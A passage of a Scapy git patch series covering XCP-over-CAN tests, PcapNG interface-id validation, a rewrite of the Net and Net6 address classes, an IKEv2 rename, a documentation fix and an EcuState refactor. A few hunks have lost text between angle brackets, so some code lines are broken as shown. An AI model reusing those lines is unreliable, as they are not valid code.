connect_response.max_cto == 8 -assert connect_response.max_cto == 8 - -assert connect_response.xcp_protocol_layer_version_number_msb == 0x10 -assert connect_response.xcp_transport_layer_version_number_msb == 0x10 - -assert conf.contribs['XCP']['byte_order'] == 0 -assert conf.contribs['XCP']['MAX_CTO'] == 8 -assert conf.contribs['XCP']['MAX_DTO'] == 8 -assert conf.contribs['XCP']['Address_Granularity_Byte'] == 1 - -= Endianness test for ConnectPositiveResponse - -p = ConnectPositiveResponse(b"\x00\xFF\x01\x00\xFF\x05\x05") -assert p.max_dto_le is None -assert p.max_dto == 0xff - -p = ConnectPositiveResponse(b"\x00\x00\x01\xFF\x00\x05\x05") -assert p.max_dto_le == 0xff -assert p.max_dto is None - -= Wrong answer - -request = XCPOnCAN(identifier=0x700) / CTORequest() / Connect() - -# This response has not enough bytes for a ConnectPositiveResponse -response = XCPOnCAN(identifier=0x90) / CTOResponse() / Raw(b'\x01\x02\x03\x04') - -assert not response.answers(request) - - -+ Cleanup VCAN -= Delete vcan interfaces -~ vcan_socket needs_root linux - -if 0 != call(["sudo", "ip", "link", "delete", iface_name]): - raise Exception("%s could not be deleted" % iface_name) - + Tests for XCPonUDP -= Imports - -from scapy.config import conf - -from scapy.contrib.automotive.xcp.cto_commands_master import Connect -from scapy.contrib.automotive.xcp.xcp import CTORequest, XCPOnUDP -from scapy.main import load_layer - -= Load module - -load_layer("can", globals_dict=globals()) -load_contrib("automotive.xcp.xcp", globals_dict=globals()) = CONNECT @@ -829,8 +652,6 @@ xcp_on_udp_request = XCPOnUDP(sport=1, dport=2, ctr=0) / CTORequest() / Connect( assert bytes(xcp_on_udp_request)[8:10] == b'\x00\x02' + Tests XCPonTCP -= Imports -from scapy.contrib.automotive.xcp.xcp import XCPOnTCP = CONNECT diff --git a/test/contrib/automotive/xcp/xcp_comm.uts b/test/contrib/automotive/xcp/xcp_comm.uts new file mode 100644 index 00000000000..7794ec34e56 --- /dev/null +++ b/test/contrib/automotive/xcp/xcp_comm.uts @@ -0,0 +1,126 @@ +% Regression tests for the XCP using CANSockets +# More information at http://www.secdev.org/projects/UTscapy/ + +############ +############ + ++ Configuration +~ conf + += Imports + +import scapy.modules.six as six + +if six.PY3: + exec(open("test/contrib/automotive/interface_mockup.py").read()) +else: + execfile("test/contrib/automotive/interface_mockup.py") + + += Load module + +load_contrib("automotive.xcp.xcp", globals_dict=globals()) + += Connect + +evt = threading.Event() + +def ecu(): + global evt + with new_can_socket1() as sock2: + sock2.basecls = XCPOnCAN + response = XCPOnCAN( + identifier=0x700) / CTOResponse() / ConnectPositiveResponse( + b'\x15\xC0\x08\x08\x00\x10\x10') + while True: + pkts = sock2.sniff(count=1, timeout=5, started_callback=evt.set) + if len(pkts): + if pkts[0].identifier == 0x100: + break + sock2.send(response) + +with new_can_socket1() as sock1: + sock1.basecls = XCPOnCAN + thread = threading.Thread(target=ecu) + thread.start() + evt.wait(timeout=10) + pkt = XCPOnCAN(identifier=0x700) / CTORequest() / Connect() + for x in range(10): + ans = sock1.sr1(pkt, timeout=0.5) + if ans is not None: + break + sock1.send(XCPOnCAN(identifier=0x100)) + thread.join(timeout=10) + +assert ans.identifier == 0x700 +cto_response = ans["CTOResponse"] +assert cto_response.packet_code == 0xff + +connect_response = cto_response["ConnectPositiveResponse"] + +assert connect_response.resource == 0x15 +assert connect_response.comm_mode_basic == 0xC0 +assert connect_response.max_cto == 8 +assert connect_response.max_dto is None +assert connect_response.max_dto_le == 8 + +assert connect_response.xcp_protocol_layer_version_number_msb == 0x10 +assert connect_response.xcp_transport_layer_version_number_msb == 0x10 + + +cto_request = XCPOnCAN(identifier=0x700) / CTORequest() / Connect() + +assert cto_request.identifier == 0x700 +assert cto_request.pid == 0xFF +assert cto_request.connection_mode == 0 +assert bytes(cto_request) == b'\x00\x00\x07\x00\x02\x00\x00\x00\xff\x00' + +xcp_on_can = XCPOnCAN(b'\x00\x00\x05\x00\x08\x00\x00\x00\xff\x15\xC0\x08\x08\x00\x10\x10') +assert xcp_on_can.identifier == 0x500 +assert xcp_on_can.answers(cto_request) + +cto_response = xcp_on_can["CTOResponse"] +assert cto_response.packet_code == 0xFF + +connect_response = cto_response["ConnectPositiveResponse"] +assert connect_response.resource == 0x15 +assert connect_response.comm_mode_basic == 0xC0 +assert connect_response.max_cto == 8 +assert connect_response.max_cto == 8 + +assert connect_response.xcp_protocol_layer_version_number_msb == 0x10 +assert connect_response.xcp_transport_layer_version_number_msb == 0x10 + +assert conf.contribs['XCP']['byte_order'] == 0 +assert conf.contribs['XCP']['MAX_CTO'] == 8 +assert conf.contribs['XCP']['MAX_DTO'] == 8 +assert conf.contribs['XCP']['Address_Granularity_Byte'] == 1 + + += Endianness test for ConnectPositiveResponse + +p = ConnectPositiveResponse(b"\x00\xFF\x01\x00\xFF\x05\x05") +assert p.max_dto_le is None +assert p.max_dto == 0xff + +p = ConnectPositiveResponse(b"\x00\x00\x01\xFF\x00\x05\x05") +assert p.max_dto_le == 0xff +assert p.max_dto is None + + += Wrong answer + +request = XCPOnCAN(identifier=0x700) / CTORequest() / Connect() + +# This response has not enough bytes for a ConnectPositiveResponse +response = XCPOnCAN(identifier=0x90) / CTOResponse() / Raw(b'\x01\x02\x03\x04') + +assert not response.answers(request) + + ++ Cleanup + += Delete vcan interfaces + +assert cleanup_interfaces() + From 226b0d366424450602975f076d965547c19d907f Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Thu, 11 Feb 2021 12:54:22 +0100 Subject: [PATCH 0507/1632] Ensure that the PcapNG interface identifier is valid --- scapy/utils.py | 14 ++++++++++++++ test/regression.uts | 8 ++++++++ 2 files changed, 22 insertions(+) diff --git a/scapy/utils.py b/scapy/utils.py index b5f6e1eb827..6034c822ecc 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1491,6 +1491,14 @@ def _read_block_idb(self, block, _): raise EOFError self.interfaces.append(interface) + def _check_interface_id(self, intid): + # type: (int) -> None + """Check the interface id value and raise EOFError if invalid.""" + tmp_len = len(self.interfaces) + if intid >= tmp_len: + warning("PcapNg: invalid interface id %d/%d" % (intid, tmp_len)) + raise EOFError + def _read_block_epb(self, block, size): # type: (bytes, int) -> Tuple[bytes, RawPcapNgReader.PacketMetadata] """Enhanced Packet Block""" @@ -1501,6 +1509,8 @@ def _read_block_epb(self, block, size): ) except struct.error: raise EOFError + + self._check_interface_id(intid) return (block[20:20 + caplen][:size], RawPcapNgReader.PacketMetadata(linktype=self.interfaces[intid][0], # noqa: E501 tsresol=self.interfaces[intid][2], # noqa: E501 @@ -1515,6 +1525,8 @@ def _read_block_spb(self, block, size): # been captured on the interface previously specified in the # first Interface Description Block." intid = 0 + self._check_interface_id(intid) + wirelen, = struct.unpack(self.endian + "I", block[:4]) caplen = min(wirelen, self.interfaces[intid][1]) return (block[4:4 + caplen][:size], @@ -1531,6 +1543,8 @@ def _read_block_pkt(self, block, size): self.endian + "HH4I", block[:20], ) + + self._check_interface_id(intid) return (block[20:20 + caplen][:size], RawPcapNgReader.PacketMetadata(linktype=self.interfaces[intid][0], # noqa: E501 tsresol=self.interfaces[intid][2], # noqa: E501 diff --git a/test/regression.uts b/test/regression.uts index ba7c519f2e1..08c4eba551e 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -2003,6 +2003,14 @@ except Scapy_Exception: invalid_pcapngfile_2 = BytesIO(b'\n\r\r\n\x00\x00\x00\x10\x1a+ raise EOFError +try: + invalid_pcapngfile_3 = BytesIO(b'\n\n\n\x14\x00\x00\x00M<+\x1a \x14\x00\x00\x00\x03\x00\x00\x00\x14\x00\x00\x00 \x14\x00\x00\x00') + rdpcap(invalid_pcapngfile_3) + assert False +except Scapy_Exception: + pass + = Check PcapWriter on null write f = BytesIO() From bba7386092b60649978efff417b452709b6273fa Mon Sep 17 00:00:00 2001 From: Pierre Lalet Date: Sat, 13 Feb 2021 15:01:06 +0100 Subject: [PATCH 0508/1632] Enhance Net() & Net6() Net() & Net6() are really not efficient. This commit implements them using simple data structures, similar to range() objects. For example, it makes it possible to run `'::' in Net6('::/0')`. --- scapy/base_classes.py | 121 +++++++++++++++++++++---------------- scapy/utils6.py | 102 +++++++------------------------ test/contrib/gtp.uts | 3 +- test/regression.uts | 42 +++++++------ test/scapy/layers/dhcp.uts | 2 +- 5 files changed, 116 insertions(+), 154 deletions(-) diff --git a/scapy/base_classes.py b/scapy/base_classes.py index 6cf4aceea32..1ce2970b24a 100644 --- a/scapy/base_classes.py +++ b/scapy/base_classes.py @@ -16,9 +16,9 @@ from functools import reduce import operator import os -import re import random import socket +import struct import subprocess import types import warnings @@ -106,91 +106,106 @@ def __repr__(self): class Net(Gen[str]): - """Generate a list of IPs from a network address or a name""" - name = "ip" - ip_regex = re.compile(r"^(\*|[0-2]?[0-9]?[0-9](-[0-2]?[0-9]?[0-9])?)\.(\*|[0-2]?[0-9]?[0-9](-[0-2]?[0-9]?[0-9])?)\.(\*|[0-2]?[0-9]?[0-9](-[0-2]?[0-9]?[0-9])?)\.(\*|[0-2]?[0-9]?[0-9](-[0-2]?[0-9]?[0-9])?)(/[0-3]?[0-9])?$") # noqa: E501 + """Network object from an IP address or hostname and mask""" + name = "Net" # type: str + family = socket.AF_INET # type: int + max_mask = 32 # type: int - @staticmethod - def _parse_digit(a, netmask): - # type: (str, int) -> Tuple[int, int] - netmask = min(8, max(netmask, 0)) - if a == "*": - return (0, 256) - elif a.find("-") >= 0: - x, y = [int(d) for d in a.split('-')] - if x > y: - y = x - return (x & (0xff << netmask), max(y, (x | (0xff >> (8 - netmask)))) + 1) # noqa: E501 - else: - return (int(a) & (0xff << netmask), (int(a) | (0xff >> (8 - netmask))) + 1) # noqa: E501 + @classmethod + def name2addr(cls, name): + # type: (str) -> str + return next( + addr_port[0] + for family, _, _, _, addr_port in + socket.getaddrinfo(name, None, cls.family) + if family == cls.family + ) @classmethod - def _parse_net(cls, net): - # type: (str) -> Tuple[List[Tuple[int, int]], int] - tmp = net.split('/') + ["32"] - if not cls.ip_regex.match(net): - tmp[0] = socket.gethostbyname(tmp[0]) - netmask = int(tmp[1]) - ret_list = [cls._parse_digit(x, y - netmask) for (x, y) in zip(tmp[0].split('.'), [8, 16, 24, 32])] # noqa: E501 - return ret_list, netmask + def ip2int(cls, addr): + # type: (str) -> int + return cast(int, struct.unpack( + "!I", socket.inet_aton(cls.name2addr(addr)) + )[0]) + + @staticmethod + def int2ip(val): + # type: (int) -> str + return socket.inet_ntoa(struct.pack('!I', val)) def __init__(self, net): # type: (str) -> None - self.repr = net - self.parsed, self.netmask = self._parse_net(net) + try: + net, mask = net.split("/", 1) + except ValueError: + self.mask = self.max_mask + else: + self.mask = int(mask) + self.net = net + inv_mask = self.max_mask - self.mask + self.start = self.ip2int(net) >> inv_mask << inv_mask + self.count = 1 << inv_mask + self.stop = self.start + self.count - 1 def __str__(self): # type: () -> str - return next(self.__iter__(), "") + return next(iter(self), "") def __iter__(self): # type: () -> Iterator[str] - for d in range(*self.parsed[3]): - for c in range(*self.parsed[2]): - for b in range(*self.parsed[1]): - for a in range(*self.parsed[0]): - yield "%i.%i.%i.%i" % (a, b, c, d) + # Python 2 won't handle huge (> sys.maxint) values in range() + for i in range(self.count): + yield self.int2ip(self.start + i) + + def __len__(self): + # type: () -> int + return self.count def __iterlen__(self): # type: () -> int - return reduce(operator.mul, ((y - x) for (x, y) in self.parsed), 1) + # for compatibility + return len(self) def choice(self): # type: () -> str - return ".".join(str(random.randint(v[0], v[1] - 1)) for v in self.parsed) # noqa: E501 + return self.int2ip(random.randint(self.start, self.stop)) def __repr__(self): # type: () -> str - return "Net(%r)" % self.repr + return '%s("%s/%d")' % (self.__class__.__name__, self.net, self.mask) def __eq__(self, other): # type: (Any) -> bool - if not other: + if type(other) is not self.__class__: return False - if hasattr(other, "parsed"): - p2 = other.parsed - else: - p2, nm2 = self._parse_net(other) - return bool(self.parsed == p2) + return cast( + bool, + (self.start == other.start) and (self.stop == other.stop), + ) def __ne__(self, other): # type: (Any) -> bool # Python 2.7 compat return not self == other - __hash__ = None # type: ignore + def __hash__(self): + # type: () -> int + return hash((self.__class__.__name__, self.start, self.stop)) def __contains__(self, other): - # type: (Union[str, Net]) -> bool - if hasattr(other, "parsed"): - p2 = cast(Net, other).parsed - else: - p2, _ = self._parse_net(cast(str, other)) - return all(a1 <= a2 and b1 >= b2 for (a1, b1), (a2, b2) in zip(self.parsed, p2)) # noqa: E501 - - def __rcontains__(self, other): - # type: (str) -> bool - return self in self.__class__(other) + # type: (Any) -> bool + if isinstance(other, int): + return self.start <= other <= self.stop + if isinstance(other, str): + return self.__class__(other) in self + if type(other) is not self.__class__: + return False + return cast( + bool, + (self.mask <= other.mask and ( + self.start <= other.start <= self.stop + )), + ) class OID(Gen[str]): diff --git a/scapy/utils6.py b/scapy/utils6.py index 96bdcbe3a01..0061375e4c9 100644 --- a/scapy/utils6.py +++ b/scapy/utils6.py @@ -10,14 +10,12 @@ Utility functions for IPv6. """ from __future__ import absolute_import -import operator import socket import struct import time -import re from scapy.config import conf -from scapy.base_classes import Gen +from scapy.base_classes import Net from scapy.data import IPV6_ADDR_GLOBAL, IPV6_ADDR_LINKLOCAL, \ IPV6_ADDR_SITELOCAL, IPV6_ADDR_LOOPBACK, IPV6_ADDR_UNICAST,\ IPV6_ADDR_MULTICAST, IPV6_ADDR_6TO4, IPV6_ADDR_UNSPECIFIED @@ -29,12 +27,12 @@ from functools import reduce, cmp_to_key from scapy.compat import ( - Any, Iterator, List, Optional, Tuple, Union, + cast, ) @@ -907,78 +905,24 @@ def in6_isvalid(address): return False -class Net6(Gen[str]): # syntax ex. fec0::/126 - """Generate a list of IPv6s from a network address or a name""" - name = "ipv6" - ip_regex = re.compile(r"^([a-fA-F0-9:]+)(/[1]?[0-3]?[0-9])?$") - - def __init__(self, net): - # type: (str) -> None - self.repr = net - - tmp = net.split('/') + ["128"] - if not self.ip_regex.match(net): - tmp[0] = socket.getaddrinfo(tmp[0], None, socket.AF_INET6)[0][-1][0] # noqa: E501 - - netmask = int(tmp[1]) - self.net = inet_pton(socket.AF_INET6, tmp[0]) - self.mask = in6_cidr2mask(netmask) - self.plen = netmask - self.parsed = [] # type: List[Tuple[int, int]] - - def _parse(self): - # type: () -> None - def parse_digit(value, netmask): - # type: (int, int) -> Tuple[int, int] - netmask = min(8, max(netmask, 0)) - return (value & (0xff << netmask), - (value | (0xff >> (8 - netmask))) + 1) - - self.parsed = [ - parse_digit(x, y) for x, y in zip( - struct.unpack("16B", in6_and(self.net, self.mask)), - (x - self.plen for x in range(8, 129, 8)), - ) - ] - - def __iter__(self): - # type: () -> Iterator[str] - self._parse() - - def rec(n, li): - # type: (int, List[str]) -> List[str] - sep = ':' if n and n % 2 == 0 else '' - if n == 16: - return li - return rec(n + 1, [y + sep + '%.2x' % i - # faster than '%s%s%.2x' % (y, sep, i) - for i in range(*self.parsed[n]) - for y in li]) - - return (in6_ptop(addr) for addr in iter(rec(0, ['']))) - - def __iterlen__(self): - # type: () -> int - self._parse() - return reduce(operator.mul, ((y - x) for x, y in self.parsed), 1) - - def __str__(self): - # type: () -> str - try: - return next(self.__iter__()) - except (StopIteration, RuntimeError): - return "" - - def __eq__(self, other): - # type: (Any) -> bool - return str(other) == str(self) - - def __ne__(self, other): - # type: (Any) -> bool - return not self == other - - __hash__ = None # type: ignore - - def __repr__(self): - # type: () -> str - return "Net6(%r)" % self.repr +class Net6(Net): # syntax ex. 2011:db8::/126 + """Network object from an IP address or hostname and mask""" + name = "Net6" # type: str + family = socket.AF_INET6 # type: int + max_mask = 128 # type: int + + @classmethod + def ip2int(cls, addr): + # type: (str) -> int + val1, val2 = struct.unpack( + '!QQ', inet_pton(socket.AF_INET6, cls.name2addr(addr)) + ) + return cast(int, (val1 << 64) + val2) + + @staticmethod + def int2ip(val): + # type: (int) -> str + return inet_ntop( + socket.AF_INET6, + struct.pack('!QQ', val >> 64, val & 0xffffffffffffffff), + ) diff --git a/test/contrib/gtp.uts b/test/contrib/gtp.uts index 7fac5246dc2..078db75fb65 100644 --- a/test/contrib/gtp.uts +++ b/test/contrib/gtp.uts @@ -72,7 +72,8 @@ random.seed(0x2807) rg = raw(gtp) rg assert rg in [ - b"E\x00\x00K\x00\x01\x00\x00@\x11|\x9f\x7f\x00\x00\x01\x7f\x00\x00\x01\x08K\x08K\x007\x99\xce0\x10\x00'\x00\x00\n\xf7\x10\x12\x05\xf7(\x14\x0b\x85\x00\x04\xb7\xd0\xbf \x85\x00\x04\xe2\xb8\x88\x19\x87\x00\x0ffOTLcIukpXKxV0Z", + b"E\x00\x00K\x00\x01\x00\x00@\x11|\x9f\x7f\x00\x00\x01\x7f\x00\x00\x01\x08K\x08K\x007\x8e\x860\x10\x00'\x00\x00\n\xf7\x10\x12\x05\xf7(\x14\x0b\x85\x00\x04_\xe2,i\x85\x00\x04\xadm\x97\x83\x87\x00\x0f1DfOTLcIukpXKxV", + b'E\x00\x00K\x00\x01\x00\x00@\x11|\x9f\x7f\x00\x00\x01\x7f\x00\x00\x01\x08K\x08K\x007ty0\x10\x00\'\x00\x00\n\xf7\x10\xf0\x84"\x1c\x14\x00\x85\x00\x04\x02D\x81\xe8\x85\x00\x04\xbd\xeb\x92z\x87\x00\x0fv2LUNmjgwdrVOeg', b"E\x00\x00K\x00\x01\x00\x00@\x11|\x9f\x7f\x00\x00\x01\x7f\x00\x00\x01\x08K\x08K\x007n\xb20\x10\x00'\x00\x00\n\xf7\x10\x91\x9f\xbc\xaa\x14\x07\x85\x00\x04<\x7f\x87\x14\x85\x00\x04\xbcU\x14\xcb\x87\x00\x0f9Co27Fbj65eKHyQ", ] diff --git a/test/regression.uts b/test/regression.uts index bd7a879dff3..db34bc99a08 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -3322,28 +3322,24 @@ for binfrm in ["\x00" * 15, b"\x00" * 17]: = Net -n1 = Net("192.168.0.0/31") -[ip for ip in n1] == ["192.168.0.0", "192.168.0.1"] +assert list(Net("192.168.0.0/31")) == ["192.168.0.0", "192.168.0.1"] -n2 = Net("192.168.0.*") -sum(1 for ip in n2) == 256 -assert n2.__iterlen__() == 256 +assert "1.2.3.4" in Net("0.0.0.0/0") -n3 = Net("192.168.0.1-5") -sum(1 for ip in n3) == 5 -assert n3.__iterlen__() == 5 +assert "192.168.0.0/25" in Net("192.168.0.0/24") -(n1 == n3) == False +assert "192.168.0.0/23" not in Net("192.168.0.0/24") -(n3 in n2) == True +assert "0.0.0.0/1" in Net("0.0.0.0/0") -= Net using web address +assert "0.0.0.0/0" not in Net("0.0.0.0/1") + += Net using name ~ netaccess ip = IP(dst="www.google.com") n1 = ip.dst assert isinstance(n1, Net) -assert n1.ip_regex.match(str(n1)) ip.show() = Multiple IP addresses test @@ -3365,11 +3361,17 @@ assert oid.__iterlen__() == 3 = Net6 n1 = Net6("2001:db8::/127") -sum(1 for ip in n1) == 2 +assert len(list(n1)) == 2 +assert len(n1) == 2 n2 = Net6("fec0::/110") -#len([x for x in n2]) returns 262144 (very slow) -assert n2.__iterlen__() == 262144 +assert len(n2) == 262144 + +assert "ffff::ffff" in Net6("::/0") + +assert "::/1" in Net6("::/0") + +assert "::/0" not in Net6("::/1") = Net6 using web address ~ netaccess ipv6 @@ -3377,12 +3379,11 @@ assert n2.__iterlen__() == 262144 ip = IPv6(dst="www.google.com") n1 = ip.dst assert isinstance(n1, Net6) -assert n1.ip_regex.match(str(n1)) +assert "www.google.com" in repr(n1) ip.show() ip = IPv6(dst="www.yahoo.com") -addrs = [ip.dst, IPv6(raw(ip)).dst, [p.dst for p in ip][0]] -assert addrs[0] == addrs[1] == addrs[2] +assert IPv6(raw(ip)).dst == [p.dst for p in ip][0] = Multiple IPv6 addresses test ~ netaccess ipv6 @@ -3398,13 +3399,14 @@ assert isinstance(src, str) ~ netaccess conf.color_theme = BlackAndWhite() -assert "Net('www.google.com')" in repr(IP(src="www.google.com")) +output = repr(IP(src="www.google.com")) +assert 'Net("www.google.com/32")' in output = Test repr on Net ~ netaccess ipv6 conf.color_theme = BlackAndWhite() -assert "Net6('www.google.com')" in repr(IPv6(src="www.google.com")) +assert 'Net6("www.google.com/128")' in repr(IPv6(src="www.google.com")) ############ ############ diff --git a/test/scapy/layers/dhcp.uts b/test/scapy/layers/dhcp.uts index c04c78d84a8..323d7c85208 100644 --- a/test/scapy/layers/dhcp.uts +++ b/test/scapy/layers/dhcp.uts @@ -12,7 +12,7 @@ import random random.seed(0x2809) o = str(RandDHCPOptions(size=1)) # print("RandDHCPOptions %s" % o) -assert o in [r"[('NIS_server', '0.45.231.69')]", r"[('tcp_keepalive_interval', 3853054080)]", r"[('tcp_keepalive_interval', 3853054080L)]"] +assert o in [r"[('NIS_server', '215.226.221.106')]", r"[('tcp_keepalive_interval', 3853054080)]", r"[('tcp_keepalive_interval', 3853054080L)]"] = DHCPOptionsField From f67637303e932abf9fb16f5e98c9f8b18a8f4656 Mon Sep 17 00:00:00 2001 From: Pierre Lalet Date: Thu, 11 Feb 2021 06:02:05 +0100 Subject: [PATCH 0509/1632] Support ranges in Net() and Net6() objects --- scapy/base_classes.py | 59 +++++++++++++++++++++++++++---------------- test/regression.uts | 16 ++++++++++++ 2 files changed, 53 insertions(+), 22 deletions(-) diff --git a/scapy/base_classes.py b/scapy/base_classes.py index 1ce2970b24a..a8db11157c2 100644 --- a/scapy/base_classes.py +++ b/scapy/base_classes.py @@ -133,19 +133,25 @@ def int2ip(val): # type: (int) -> str return socket.inet_ntoa(struct.pack('!I', val)) - def __init__(self, net): - # type: (str) -> None - try: - net, mask = net.split("/", 1) - except ValueError: - self.mask = self.max_mask + def __init__(self, net, stop=None): + # type: (str, Union[None, str]) -> None + if stop is None: + try: + net, mask = net.split("/", 1) + except ValueError: + self.mask = self.max_mask # type: Union[None, int] + else: + self.mask = int(mask) + self.net = net # type: Union[None, str] + inv_mask = self.max_mask - self.mask + self.start = self.ip2int(net) >> inv_mask << inv_mask + self.count = 1 << inv_mask + self.stop = self.start + self.count - 1 else: - self.mask = int(mask) - self.net = net - inv_mask = self.max_mask - self.mask - self.start = self.ip2int(net) >> inv_mask << inv_mask - self.count = 1 << inv_mask - self.stop = self.start + self.count - 1 + self.start = self.ip2int(net) + self.stop = self.ip2int(stop) + self.count = self.stop - self.start + 1 + self.net = self.mask = None def __str__(self): # type: () -> str @@ -172,16 +178,27 @@ def choice(self): def __repr__(self): # type: () -> str - return '%s("%s/%d")' % (self.__class__.__name__, self.net, self.mask) + if self.mask is not None: + return '%s("%s/%d")' % ( + self.__class__.__name__, + self.net, + self.mask, + ) + return '%s("%s", "%s")' % ( + self.__class__.__name__, + self.int2ip(self.start), + self.int2ip(self.stop), + ) def __eq__(self, other): # type: (Any) -> bool - if type(other) is not self.__class__: + if isinstance(other, str): + return self == self.__class__(other) + if not isinstance(other, Net): return False - return cast( - bool, - (self.start == other.start) and (self.stop == other.stop), - ) + if self.family != other.family: + return False + return (self.start == other.start) and (self.stop == other.stop) def __ne__(self, other): # type: (Any) -> bool @@ -190,7 +207,7 @@ def __ne__(self, other): def __hash__(self): # type: () -> int - return hash((self.__class__.__name__, self.start, self.stop)) + return hash(("scapy.Net", self.family, self.start, self.stop)) def __contains__(self, other): # type: (Any) -> bool @@ -202,9 +219,7 @@ def __contains__(self, other): return False return cast( bool, - (self.mask <= other.mask and ( - self.start <= other.start <= self.stop - )), + (self.start <= other.start <= other.stop <= self.stop), ) diff --git a/test/regression.uts b/test/regression.uts index db34bc99a08..84157d2d937 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -3334,6 +3334,10 @@ assert "0.0.0.0/1" in Net("0.0.0.0/0") assert "0.0.0.0/0" not in Net("0.0.0.0/1") +assert Net("1.2.3.0/24") == Net("1.2.3.0", "1.2.3.255") + +assert hash(Net("1.2.3.0/24")) == hash(Net("1.2.3.0", "1.2.3.255")) + = Net using name ~ netaccess @@ -3373,6 +3377,18 @@ assert "::/1" in Net6("::/0") assert "::/0" not in Net6("::/1") +assert Net6("::/120") == Net6("::", "::ff") + +assert hash(Net6("::/120")) == hash(Net6("::", "::ff")) + +assert Net6("::1.2.3.0/120") == Net6("::1.2.3.0", "::1.2.3.255") + +assert hash(Net6("::1.2.3.0/120")) == hash(Net6("::1.2.3.0", "::1.2.3.255")) + +assert Net6("::1.2.3.0/120") != Net("1.2.3.0/24") + +assert hash(Net6("::1.2.3.0/120")) != hash(Net("1.2.3.0/24")) + = Net6 using web address ~ netaccess ipv6 From 0e2a2a9293a2e950ef0dda07995815c39a927baf Mon Sep 17 00:00:00 2001 From: Tobias Specht Date: Thu, 4 Feb 2021 17:05:44 +0100 Subject: [PATCH 0510/1632] Fix class name of Encrypted_Fragment --- scapy/contrib/ikev2.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/contrib/ikev2.py b/scapy/contrib/ikev2.py index 60cad4822e9..7799fd1e4f7 100644 --- a/scapy/contrib/ikev2.py +++ b/scapy/contrib/ikev2.py @@ -384,7 +384,7 @@ IKEv2_payload_type.extend([""] * 29) IKEv2_payload_type.extend(["SA", "KE", "IDi", "IDr", "CERT", "CERTREQ", "AUTH", "Nonce", "Notify", "Delete", # noqa: E501 - "VendorID", "TSi", "TSr", "Encrypted", "CP", "EAP", "", "", "", "", "Encrypted Fragment"]) # noqa: E501 + "VendorID", "TSi", "TSr", "Encrypted", "CP", "EAP", "", "", "", "", "Encrypted_Fragment"]) # noqa: E501 IKEv2_exchange_type = [""] * 34 IKEv2_exchange_type.extend(["IKE_SA_INIT", "IKE_AUTH", "CREATE_CHILD_SA", From b9203d18944b7f8894db44fee25e0106665574e6 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sun, 24 Jan 2021 13:27:57 +0100 Subject: [PATCH 0511/1632] Fix outdated doc --- doc/scapy/build_dissect.rst | 36 ++++++++++++++++++------------------ 1 file changed, 18 insertions(+), 18 deletions(-) diff --git a/doc/scapy/build_dissect.rst b/doc/scapy/build_dissect.rst index 79e8d99b787..e5c11a8f302 100644 --- a/doc/scapy/build_dissect.rst +++ b/doc/scapy/build_dissect.rst @@ -187,24 +187,24 @@ last byte. For instance, 0x123456 will be coded as 0xC8E856:: def vlenq2str(l): s = [] - s.append( hex(l & 0x7F) ) + s.append(l & 0x7F) l = l >> 7 - while l>0: - s.append( hex(0x80 | (l & 0x7F) ) ) + while l > 0: + s.append( 0x80 | (l & 0x7F) ) l = l >> 7 s.reverse() - return "".join(chr(int(x, 16)) for x in s) + return bytes(bytearray(s)) - def str2vlenq(s=""): + def str2vlenq(s=b""): i = l = 0 - while i>> f = FOO(data="A"*129) - >>> f.show() - ###[ FOO ]### - len= 0 - data= 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - -Here, ``len`` is not yet computed and only the default value are -displayed. This is the current internal representation of our + >>> f = FOO(data="A"*129) + >>> f.show() + ###[ FOO ]### + len= None + data= 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + +Here, ``len`` has yet to be computed and only the default value is +displayed. This is the current internal representation of our layer. Let's force the computation now:: >>> f.show2() @@ -259,7 +259,7 @@ layer. Let's force the computation now:: len= 129 data= 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' -The method ``show2()`` displays the fields with their values as they will +The method ``show2()`` displays the fields with their values as they will be sent to the network, but in a human readable way, so we see ``len=129``. Last but not least, let us look now at the machine representation:: From c4734ba30968c14ea774170d6251eb1197ea5727 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 15 Feb 2021 00:20:49 +0100 Subject: [PATCH 0512/1632] Refactoring of EcuState object (#3083) * Refactoring of EcuState object * applied feedback --- scapy/contrib/automotive/ecu.py | 126 +++++++++++--- test/contrib/automotive/ecu.uts | 291 ++++++++++++++++++++++++++++++++ 2 files changed, 390 insertions(+), 27 deletions(-) diff --git a/scapy/contrib/automotive/ecu.py b/scapy/contrib/automotive/ecu.py index d71b0b8f67a..3cda649b491 100644 --- a/scapy/contrib/automotive/ecu.py +++ b/scapy/contrib/automotive/ecu.py @@ -12,7 +12,9 @@ import random from collections import defaultdict +from types import GeneratorType +from scapy.compat import Any, cast, Dict from scapy.packet import Raw, Packet from scapy.plist import PacketList from scapy.error import Scapy_Exception @@ -25,46 +27,113 @@ class EcuState(object): - def __init__(self, session=1, tester_present=False, security_level=0, - communication_control=0, **kwargs): - self.session = session - self.security_level = security_level - self.communication_control = communication_control - self._tp = tester_present - self.misc = kwargs + """ + Stores the state of an Ecu. The state is defined by a protocol, for + example UDS or GMLAN. + A EcuState supports comparison and serialization (command()). + """ + def __init__(self, **kwargs): + # type: (Dict[str, Any]) -> None + for k, v in kwargs.items(): + if isinstance(v, GeneratorType): + v = list(v) + self.__setattr__(k, v) - def reset(self): - self.session = 1 - self.security_level = 0 - self.communication_control = 0 - self._tp = False - self.misc = dict() + def __getitem__(self, item): + # type: (str) -> Any + return self.__dict__[item] - @property - def tp(self): - return self._tp or self.session > 1 + def __setitem__(self, key, value): + # type: (str, Any) -> None + self.__dict__[key] = value + + def __repr__(self): + # type: () -> str + return 